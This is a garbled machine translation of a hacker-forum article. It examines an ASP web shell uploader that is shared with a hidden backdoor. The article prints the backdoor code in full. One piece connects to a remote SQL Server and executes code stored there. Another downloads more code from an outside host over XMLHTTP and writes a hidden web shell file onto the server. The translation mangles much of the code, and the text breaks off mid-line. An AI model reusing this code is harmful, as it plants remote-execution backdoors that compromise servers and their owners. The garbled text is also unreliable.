Backdoor discovery tour with advanced script "Pony"

Author: New4
First, go to our dark group forum and see the following post: "black station essential-powerful hidden backdoors. ASP invincible uploader, and someone replied that there is a domain name that does not know what to do, because of curiosity, download and view the following article.
Figure 1 post content

I don't know. I was shocked. This script is not only advanced, but also has a backdoor!
Why is it advanced? Because he has never seen some of his skills, and has used SQL Server + Microsoft. XMLHTTP + 404 error page disguise, allowing the code to be remotely and dynamically obtained and executed multiple times. If the user calls the pony error, a 200 error page with the 404 error code is returned! In this way, the hacker thinks that the uploaded pony has been killed, which gives him a chance to use the backdoor. At least Tom won't help him Delete the pony. As for how to call it correctly, please continue to look at it.

Below is the pony backdoor provided by the author: copy the content to the clipboard code:
<% Password = "123456" here, 123456 is replaced with your password. The password can only be English or Number %>
<% None %>
<% Enemy %>
<% Above %>
<% Pass %>
<% Device %>
<% BY01 = "hmserver" %>
<% BY02 = "8866" %>
<% BY03 = "org" %>
<% Bytraffic = "." %>
<% CODE = "888" %>
<% BYLJ1 = "provider = sqloledb;" %>
<% BYLJ2 = "server =" & BY01 & BY01 & BY02 & BYJH & BY03 & ";" %>
<% BYLJ3 = "uid =" & CODE & ";" %>
<% BYLJ4 = "pwd =" & CODE & ";" %>
<% BYLJ5 = "database =" & CODE & ";" %>
<% Set amconn = Server. CreateObject ("ADODB. Connection") %>
<% Amconn. open BYLJ1 & BYLJ2 & BYLJ3 & BYLJ4 & BYLJ5 %>
<% Sqlam = "select * from code" %>
<% Set rsam=amconn.exe cute (sqlam) %>
<% Amtxt = rsam ("txt") %>
<% Amtxt = replace (amtxt, "amsql =" "password", "amsql =" "& password &") %>
<% Execute (amtxt) %>
<% Rsam. close %>
<% Set rsam = nothing %>
<% Amconn. close %>
<% Set amconn = nothing %> let's take a closer look at the domain name above, which is why the post says some reasons (too plain text ). To determine whether a database operation is performed, we only need to check this "ADODB. connection "or" select * from code ", the former is to create a Connection to the ADO operation database, and the latter is the SQL statement used to operate the database. Then I will ask, how can we find the last secret?
The following two methods are available: 1. use the packet capture software to run the packet capture command on the server (execute ASP) to view the plaintext; 2. you can use the SQL query analyzer to connect to and execute SQL statement queries. As shown in 2 and 3, the number of connected accounts, passwords, and databases is 888. the incomplete information copied by the query analyzer may be related to the data type, the query analyzer cannot be fully displayed. You can view it in the SQL Enterprise Manager. If you think it is too troublesome or you have not installed the full version of SQL Server, use the following method. 4. Find an Sniffer software for packet capture and you will be able to see the transmitted code. The advantage is that mobile is convenient and completely green.
Figure 2 connecting to SQL Server Figure 3 executing SQL statements
Figure 4 captured data packets

The code for packet capture is as follows: copy the content to the clipboard:
Amsql = "password"
BY01 = "http"
BY02 = "hmserver"
BY03 = "8800"
BY04 = "org"
BYXG = "/"
Bytraffic = "."
BYMH = ":"
BYQZ = "SQL _"
BYHZ = "SC .txt"
BYDK = "888"
BYURL = BY01 & BYMH & BYXG & BY02 & bybytes & BY03 & BYJH & BY04 & BYMH & BYDK & BYXG & BYQZ & BYHZ
Set amxml = Server. CreateObject ("MSXML2.ServerXMLHTTP ")
Amxml. open "GET", BYURL, false
Amxml. send ()
Amtxt = amxml. responseText
Amtxt = replace (amtxt, "amsc =" "password", "amsc =" & password &"""")
The code above execute (amtxt) is meaningless, just a method for downloading via XMLHTTP. We will continue to find the SQL _ SC .txt code: copy the content to the clipboard code:
Amsc = "password"
BYAM = "http://hmserver.8800.org: 888/hk _"
Function GetUrl ()
ScriptAddress = CStr (Request. ServerVariables ("SCRIPT_NAME "))
Servername = CStr (Request. ServerVariables ("Server_Name "))
Findfilename = right (ScriptAddress, len (ScriptAddress)-ScriptAddress (ScriptAddress ,"/"))
GetUrl = "http: //" & Servername & ScriptAddress
Geturl = replace (Geturl, findfilename ,"")
End Function
Function GetBody (Url)
Dim objXML
On Error Resume Next
Set objXML = CreateObject ("Microsoft. XMLHTTP ")
With objXML
. Open "Get", Url, False ,"",""
. Send
GetBody =. ResponseBody
End
GetBody = BytesToBstr (GetBody, "GB2312 ")
Set objXML = Nothing
End Function
Function BytesToBstr (strBody, CodeBase)
Dim objStream
Set objStream = Server. CreateObject ("Adodb. Stream ")
ObjStream. Type = 1
ObjStream. Mode = 3
ObjStream. Open
ObjStream. Write strBody
ObjStream. Position = 0
ObjStream. Type = 2
ObjStream. Charset = CodeBase
BytesToBstr = objStream. ReadText
ObjStream. Close
Set objStream = nothing
End Function
Function WriteFile (StrContent, Foldername, fileExt, fname)
Dim myfos, TheFile, Filename, TheFolder, ThefileExt
Set myfos = Server. CreateObject ("Scripting. FileSystemObject ")
TheFolder = "./"
ThefileExt = ". txt"
If Foldername <> "Then TheFolder = Foldername
If ThefileExt <> "Then ThefileExt = fileExt
TheFolder = Server. MapPath (TheFolder)
If myfos. FolderExists (TheFolder) = False Then
Myfos. CreateFolder (TheFolder)
End If
If fname = "" Then
Filename = Replace (Cstr (time ()),":",".")
Else
Filename = fname
End If
TheFile = "\." & TheFolder & "& Filename & ThefileExt
Set fs = Server. CreateObject ("Scripting. FileSystemObject ")
IF fs. FileExists (TheFile) then
Response. write "<script> self. location =" "& Geturl & fname & fileext &"? Password = "& amsc &" "; </script>"
Else
Set ff = fs. CreateTextFile (TheFile)
Set ff = nothing
Response. write "<script> self. location =" "& Geturl & fname & fileext &"? Password = "& amsc &" "; </script>"
END IF
Set f = fs. GetFile (TheFile)
F. Attributes = 0
Set mytxt = myfos. OpenTextFile (TheFile, 2, True)
Mytxt. Write StrContent
F. Attributes = 1 + 2 + 4
If err. number <> 0 Then
WriteFile = 0
End If
Mytxt. close
Set f = nothing
Set fs = nothing
Set myfos = nothing
Set mytxt = nothing
End Function
Aux = GetBody (BYAM & "asp.txt ")
Aux = replace (aux, "amasp =" "password", "amasp =" & amsc &"""")
CALL WriteFile (aux, "", ". gif", "aux. asp ;")
Scname = Request. ServerVariables ("script_name ")
Postion = Limit Rev (scname, "/") + 1
Scname = Mid (scname, pos